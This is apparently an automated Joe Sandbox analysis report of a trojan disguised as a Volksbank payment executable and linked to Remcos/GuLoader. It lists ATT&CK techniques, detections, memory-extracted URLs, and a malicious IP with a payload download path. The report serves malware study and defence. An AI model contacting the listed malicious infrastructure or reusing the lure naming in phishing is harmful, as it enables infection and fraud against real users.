            Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
            Native API            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		1
            Deobfuscate/Decode Files or Information            		1
            OS Credential Dumping            		1
            System Time Discovery            		Remote Services1
            Archive Collected Data            		1
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter            		Boot or Logon Initialization Scripts1
            Access Token Manipulation            		2
            Obfuscated Files or Information            		2
            Credentials in Registry            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		2
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)112
            Process Injection            		1
            Software Packing            		1
            Credentials In Files            		3
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		1
            Non-Standard Port            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            DLL Side-Loading            		NTDS128
            System Information Discovery            		Distributed Component Object Model2
            Clipboard Data            		1
            Remote Access Software            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Masquerading            		LSA Secrets131
            Security Software Discovery            		SSHKeylogging2
            Non-Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
            Virtualization/Sandbox Evasion            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input Capture112
            Application Layer Protocol            		Data Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Access Token Manipulation            		DCSync4
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job112
            Process Injection            		Proc Filesystem1
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe37%ReversingLabsWin32.Trojan.InjectorX
            Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsf961A.tmp\System.dll0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            No Antivirus matches

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            geoplugin.net
            		178.237.33.50
            		truefalse
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://geoplugin.net/json.gpfalse
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://cdnjs.cloudflare.com/ajax/libs/gsap/3.5.1/gsap.min.jsbhvF4C4.tmp.2.drfalse
                  		unknown
                  http://www.imvu.comrPayment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7810435154.0000000034F10000.00000040.10000000.00040000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000004.00000002.2980976157.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                    		unknown
                    https://account.live.com/Resources/images/Microsoft_Logotype_White_4MYDQRab31HKDWWN-1HafA2.svgbhvF4C4.tmp.2.drfalse
                      		unknown
                      https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/k3.jpgbhvF4C4.tmp.2.drfalse
                        		unknown
                        https://acctcdn.msftauth.net/oneds_MC5gQfpbTUjLu60sQCwU1w2.js?v=1bhvF4C4.tmp.2.drfalse
                          		unknown
                          https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/footer.pngbhvF4C4.tmp.2.drfalse
                            		unknown
                            https://ajax.aspnetcdn.com/ajax/jquery/jquery-3.3.1.min.jsbhvF4C4.tmp.2.drfalse
                              		unknown
                              https://csp.withgoogle.com/csp/ads-programmablebhvF4C4.tmp.2.drfalse
                                		unknown
                                https://aefd.nelreports.net/api/report?cat=bingaotakbhvF4C4.tmp.2.drfalse
                                  		unknown
                                  https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC0ee8c30f496b428a91d7f3289a2b8a2bhvF4C4.tmp.2.drfalse
                                    		unknown
                                    https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC784fc6783b2f45a09cb8efa184cc684bhvF4C4.tmp.2.drfalse
                                      		unknown
                                      https://deff.nelreports.net/api/report?cat=msnbhvF4C4.tmp.2.drfalse
                                        		unknown
                                        https://account.live.com/Resources/images/AppCentipede/AppCentipede_Microsoft_white_ufRYlllWOw4YyDRibhvF4C4.tmp.2.drfalse
                                          		unknown
                                          https://www.google.com/chrome/Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005458183.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, bhvF4C4.tmp.2.drfalse
                                            		unknown
                                            http://cdp.thawte.com/ThawteRSACA2018.crl0LbhvF4C4.tmp.2.drfalse
                                              		unknown
                                              https://cxcs.microsoft.net/static/public/tips/neutral/6c6740da-0bfe-48a6-83fc-c98d1919b060/3addf02b7bhvF4C4.tmp.2.drfalse
                                                		unknown
                                                https://csp.withgoogle.com/csp/report-to/active-view-scs-read-write-aclbhvF4C4.tmp.2.drfalse
                                                  		unknown
                                                  https://static-ecst.licdn.com/apc/trans.gif?ae11829b3d6e895a2a3516fac536a339bhvF4C4.tmp.2.drfalse
                                                    		unknown
                                                    https://acctcdn.msftauth.net/confirmidentity_9m6e3jBPkyZiRdJxglsYsA2.js?v=1bhvF4C4.tmp.2.drfalse
                                                      		unknown
                                                      http://crls.pki.goog/gts1c3/QOvJ0N1sT2A.crl0bhvF4C4.tmp.2.drfalse
                                                        		unknown
                                                        https://www.msn.combhvF4C4.tmp.2.drfalse
                                                          		unknown
                                                          https://sync-t1.taboola.com/sg/criteortb-network/1/rtb-h/?taboola_hm=b2df1cf6-0873-4430-916b-9612e80bhvF4C4.tmp.2.drfalse
                                                            		unknown
                                                            https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-light.wobhvF4C4.tmp.2.drfalse
                                                              		unknown
                                                              https://btloader.com/tag?o=6208086025961472&upapi=truebhvF4C4.tmp.2.drfalse
                                                                		unknown
                                                                http://www.imvu.comataPayment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000004.00000003.2980743689.0000000000C3D000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000004.00000003.2980692782.0000000000C3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://use.typekit.net/af/eaf09c/000000000000000000017703/27/d?subset_id=2&fvd=n7&v=3bhvF4C4.tmp.2.drfalse
                                                                    		unknown
                                                                    https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svgbhvF4C4.tmp.2.drfalse
                                                                      		unknown
                                                                      https://acctcdn.msftauth.net/hostfooterpackage_FOuGbot8yZGKyYkh5yNQBA2.js?v=1bhvF4C4.tmp.2.drfalse
                                                                        		unknown
                                                                        https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_pad%2bhvF4C4.tmp.2.drfalse
                                                                          		unknown
                                                                          https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCe691e5baee9945259179326d0658843bhvF4C4.tmp.2.drfalse
                                                                            		unknown
                                                                            http://ocsp.sca1b.amazontrust.com06bhvF4C4.tmp.2.drfalse
                                                                              		unknown
                                                                              http://certs.godaddy.com/repository/1301bhvF4C4.tmp.2.drfalse
                                                                                		unknown
                                                                                http://i.pki.goog/r1.crt0bhvF4C4.tmp.2.drfalse
                                                                                  		unknown
                                                                                  http://www.imvu.comPayment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7810435154.0000000034F10000.00000040.10000000.00040000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000004.00000003.2980743689.0000000000C3D000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000004.00000002.2980976157.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000004.00000003.2980692782.0000000000C3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://acctcdn.msftauth.net/accountcorepackage_hSxsZy9Ymkhjr2rMMwej_g2.js?v=1bhvF4C4.tmp.2.drfalse
                                                                                      		unknown
                                                                                      http://ocsp.rootca1.amazontrust.com0:bhvF4C4.tmp.2.drfalse
                                                                                        		unknown
                                                                                        https://certs.godaddy.com/repository/0bhvF4C4.tmp.2.drfalse
                                                                                          		unknown
                                                                                          https://pki.goog/repository/0bhvF4C4.tmp.2.drfalse
                                                                                            		unknown
                                                                                            https://www.msn.com/bhvF4C4.tmp.2.drfalse
                                                                                              		unknown
                                                                                              http://i.pki.goog/wr2.crt0bhvF4C4.tmp.2.drfalse
                                                                                                		unknown
                                                                                                https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCd01d50cad19649bf857a22be5995480bhvF4C4.tmp.2.drfalse
                                                                                                  		unknown
                                                                                                  http://cacerts.thawte.com/ThawteRSACA2018.crt0bhvF4C4.tmp.2.drfalse
                                                                                                    		unknown
                                                                                                    http://crl.godaddy.com/gdroot-g2.crl0FbhvF4C4.tmp.2.drfalse
                                                                                                      		unknown
                                                                                                      http://crl.rootg2.amazontrust.com/rootg2.crl0bhvF4C4.tmp.2.drfalse
                                                                                                        		unknown
                                                                                                        https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chrom0;ord=8672137916610;Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3002520130.0000000002AC1000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005458183.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, bhvF4C4.tmp.2.drfalse
                                                                                                          		unknown
                                                                                                          https://account.live.com/Resources/images/favicon.icobhvF4C4.tmp.2.drfalse
                                                                                                            		unknown
                                                                                                            https://www.msn.com/?ocid=iehpPayment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3002520130.0000000002AC1000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3001766817.0000000002AC1000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3002030194.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005458183.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, bhvF4C4.tmp.2.drfalse
                                                                                                              		unknown
                                                                                                              https://cvision.media.net/new/300x300/2/45/221/3/7d5dc6a9-5325-442d-926e-f2c668b8e65e.jpg?v=9bhvF4C4.tmp.2.drfalse
                                                                                                                		unknown
                                                                                                                https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC8cd6be4f72cf4da1aa891e7da23d144bhvF4C4.tmp.2.drfalse
                                                                                                                  		unknown
                                                                                                                  https://aefd.nelreports.net/api/report?cat=bingrmsbhvF4C4.tmp.2.drfalse
                                                                                                                    		unknown
                                                                                                                    https://www.google.com/accounts/serviceloginPayment_Volksbank_EUR36550-Bestellung -4500673541.com.exefalse
                                                                                                                      		unknown
                                                                                                                      https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC028e72ad6b944b8183346fecb32a729bhvF4C4.tmp.2.drfalse
                                                                                                                        		unknown
                                                                                                                        https://acctcdn.msftauth.net/wlivepackagefull_stPwvW3-5mShoxrbkAw2qw2.js?v=1bhvF4C4.tmp.2.drfalse
                                                                                                                          		unknown
                                                                                                                          https://cxcs.microsoft.net/api/settings/en-US/xml/settings-tipset?release=20h1&sku=Professional&platbhvF4C4.tmp.2.drfalse
                                                                                                                            		unknown
                                                                                                                            http://crl.pki.goog/gsr1/gsr1.crl0;bhvF4C4.tmp.2.drfalse
                                                                                                                              		unknown
                                                                                                                              https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/k2.jpgbhvF4C4.tmp.2.drfalse
                                                                                                                                		unknown
                                                                                                                                http://crl.godaddy.com/gdig2s1-2558.crl0bhvF4C4.tmp.2.drfalse
                                                                                                                                  		unknown
                                                                                                                                  http://ocsp.sectigo.com0bhvF4C4.tmp.2.drfalse
                                                                                                                                    		unknown
                                                                                                                                    http://certificates.godaddy.com/repository/0bhvF4C4.tmp.2.drfalse
                                                                                                                                      		unknown
                                                                                                                                      https://aefd.nelreports.net/api/report?cat=bingthbhvF4C4.tmp.2.drfalse
                                                                                                                                        		unknown
                                                                                                                                        https://s1.adform.net/banners/scripts/rmb/Adform.DHTML.js?bv=626bhvF4C4.tmp.2.drfalse
                                                                                                                                          		unknown
                                                                                                                                          https://eb2.3lift.com/sync?Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3002520130.0000000002AC1000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005458183.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, bhvF4C4.tmp.2.drfalse
                                                                                                                                            		unknown
                                                                                                                                            https://acdn.adnxs.com/dmp/async_usersync.htmlbhvF4C4.tmp.2.drfalse
                                                                                                                                              		unknown
                                                                                                                                              https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.jsbhvF4C4.tmp.2.drfalse
                                                                                                                                                		unknown
                                                                                                                                                http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comPayment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7810435154.0000000034F10000.00000040.10000000.00040000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000004.00000002.2980976157.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  https://aefd.nelreports.net/api/report?cat=wsb&ndcParam=QUZEbhvF4C4.tmp.2.drfalse
                                                                                                                                                    		unknown
                                                                                                                                                    http://crls.pki.goog/gts1c3/zdATt0Ex_Fk.crl0bhvF4C4.tmp.2.drfalse
                                                                                                                                                      		unknown
                                                                                                                                                      https://csp.withgoogle.com/csp/report-to/adspam-signals-scsbhvF4C4.tmp.2.drfalse
                                                                                                                                                        		unknown
                                                                                                                                                        http://pki.goog/repo/certs/gts1c3.der07bhvF4C4.tmp.2.drfalse
                                                                                                                                                          		unknown
                                                                                                                                                          https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7209567Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3002520130.0000000002AC1000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005458183.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, bhvF4C4.tmp.2.drfalse
                                                                                                                                                            		unknown
                                                                                                                                                            https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2bhvF4C4.tmp.2.drfalse
                                                                                                                                                              		unknown
                                                                                                                                                              https://srtb.msn.com/auction?a=de-ch&b=bba24733ba4a487f8f8706bf3811269e&c=MSN&d=https%3A%2F%2Fwww.msbhvF4C4.tmp.2.drfalse
                                                                                                                                                                		unknown
                                                                                                                                                                http://c.pki.goog/r/r1.crl0bhvF4C4.tmp.2.drfalse
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://use.typekit.net/af/cb695f/000000000000000000017701/27/d?subset_id=2&fvd=n4&v=3bhvF4C4.tmp.2.drfalse
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://www.msn.com/de-ch/?ocid=iehpbhvF4C4.tmp.2.drfalse
                                                                                                                                                                      		unknown
                                                                                                                                                                      https://account.live.com/Resources/images/AppCentipede/AppCentipede_Microsoft_HFeToeM4u6fzMQF_f_rQ5QbhvF4C4.tmp.2.drfalse
                                                                                                                                                                        		unknown
                                                                                                                                                                        https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005458183.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, bhvF4C4.tmp.2.drfalse
                                                                                                                                                                          		unknown
                                                                                                                                                                          https://www.googletagservices.com/activeview/js/current/rx_lidar.js?cache=r20110914bhvF4C4.tmp.2.drfalse
                                                                                                                                                                            		unknown
                                                                                                                                                                            https://static.doubleclick.net/dynamic/5/283983386/11928812572019506176_2845462151855228713.jpegbhvF4C4.tmp.2.drfalse
                                                                                                                                                                              		unknown
                                                                                                                                                                              https://www.msn.com/spartan/en-gb/kernel/appcache/cache.appcache?locale=en-GB&market=GB&enableregulabhvF4C4.tmp.2.drfalse
                                                                                                                                                                                		unknown
                                                                                                                                                                                https://www.msn.com/spartan/ientp?locale=en-GB&market=GB&enableregulatorypsm=0&enablecpsm=0&NTLogo=1bhvF4C4.tmp.2.drfalse
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8d&FrbhvF4C4.tmp.2.drfalse
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCefb91313fdae420ebbea45d8f044894bhvF4C4.tmp.2.drfalse
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      https://account.live.com/identity/confirm?mkt=EN-US&uiflavor=win10host&client_id=1E0000480728C5&connbhvF4C4.tmp.2.drfalse
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        https://dsm09prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?8f6ec558c7d1c621e0d5881446d586b0bhvF4C4.tmp.2.drfalse
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gtm=Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3002520130.0000000002AC1000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005458183.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, bhvF4C4.tmp.2.drfalse
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            https://www.google.com/pagead/drt/uiPayment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3008749648.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3007602786.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3007682293.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3008046399.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005458183.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, bhvF4C4.tmp.2.drfalse
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              https://account.live.com/Resources/images/Arrows/left_qcwoJO81F7bEFg3Pj_fUEA2.svgbhvF4C4.tmp.2.drfalse
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                http://geoplugin.net/json.gpb9Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7799903641.0000000004180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  http://geoplugin.net/json.gpgramFiPayment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7799903641.0000000004180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    https://acctcdn.msftauth.net/jqueryshim_hlu0tTfjWJFWYNt1WZrVqg2.js?v=1bhvF4C4.tmp.2.drfalse
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://pki.goog/gsr1/gsr1.crt02bhvF4C4.tmp.2.drfalse
                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                        http://pki.goog/repo/certs/gts1c3.der0$bhvF4C4.tmp.2.drfalse
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_368%2Cw_622%2Cc_fill%2Cg_faces:aubhvF4C4.tmp.2.drfalse
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCacc6c4ed30494f9fad065afe638a7cabhvF4C4.tmp.2.drfalse
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:aubhvF4C4.tmp.2.drfalse
                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                https://cvision.media.net/new/300x300/2/75/165/127/fefc2984-60ee-407b-a704-0db527f30f53.jpg?v=9bhvF4C4.tmp.2.drfalse
                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                  https://ims-na1.adobelogin.com/ims/authorize/v1?locale=en_us&client_id=AdobeReader9&redirect_uri=httbhvF4C4.tmp.2.drfalse
                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                    https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-bold.wofbhvF4C4.tmp.2.drfalse
                                                                                                                                                                                                                      		unknown

                                                                                                                                                                                                                      World Map of Contacted IPs

                                                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                                                                                      Public IPs

                                                                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                      102.165.14.28
                                                                                                                                                                                                                      		unknownSouth Africa
                                                                                                                                                                                                                      		61317ASDETUKhttpwwwheficedcomGBtrue
                                                                                                                                                                                                                      178.237.33.50
                                                                                                                                                                                                                      		geoplugin.netNetherlands
                                                                                                                                                                                                                      		8455ATOM86-ASATOM86NLfalse

                                                                                                                                                                                                                      General Information

                                                                                                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                      Analysis ID:1520599
                                                                                                                                                                                                                      Start date and time:2024-09-27 16:41:53 +02:00
                                                                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                      Overall analysis duration:0h 16m 58s
                                                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                      Report type:full
                                                                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                                                                      Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                                                                                                                                      Run name:Suspected Instruction Hammering
                                                                                                                                                                                                                      Number of analysed new started processes analysed:5
                                                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                                                                      Technologies:
                                                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                                                      Sample name:Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
                                                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                                                      Classification:mal100.phis.troj.spyw.evad.winEXE@9/14@1/2
                                                                                                                                                                                                                      EGA Information:
                                                                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                                                                      HCA Information:
                                                                                                                                                                                                                      • Successful, ratio: 84%
                                                                                                                                                                                                                      • Number of executed functions: 158
                                                                                                                                                                                                                      • Number of non-executed functions: 339
                                                                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                                                                                                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                                                                                                                                                                                      Warnings

                                                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                                                                                                                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                      • VT rate limit hit for: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe

                                                                                                                                                                                                                      Simulations

                                                                                                                                                                                                                      Behavior and APIs

                                                                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                                                                      10:44:55API Interceptor27250554x Sleep call for process: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe modified

                                                                                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                                                                                      IPs

                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                      102.165.14.28Benefit_Signature_Plan#3762.com.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                      • 102.165.14.28/agwwRWrYKhF156.bin
                                                                                                                                                                                                                      178.237.33.50Nutzen_Unterschrift_Planen#2024.com.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                      • geoplugin.net/json.gp
                                                                                                                                                                                                                      SERVICE OR PRODUCT DESRIPTION AND COMPANY PROFILE.SCR.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                      • geoplugin.net/json.gp
                                                                                                                                                                                                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.31506.1346.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                      • geoplugin.net/json.gp
                                                                                                                                                                                                                      SecuriteInfo.com.Win32.Evo-gen.3521.549.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                      • geoplugin.net/json.gp
                                                                                                                                                                                                                      sostener.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                      • geoplugin.net/json.gp
                                                                                                                                                                                                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                                                                                                                      • geoplugin.net/json.gp
                                                                                                                                                                                                                      6122.scr.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                      • geoplugin.net/json.gp
                                                                                                                                                                                                                      6122.scr.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                      • geoplugin.net/json.gp
                                                                                                                                                                                                                      SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                      • geoplugin.net/json.gp
                                                                                                                                                                                                                      https://maveuve.github.io/frlpodf/marynewreleasefax.htmlGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                      • geoplugin.net/json.gp

                                                                                                                                                                                                                      Domains

                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                      geoplugin.netNutzen_Unterschrift_Planen#2024.com.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                      • 178.237.33.50
                                                                                                                                                                                                                      SERVICE OR PRODUCT DESRIPTION AND COMPANY PROFILE.SCR.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                      • 178.237.33.50
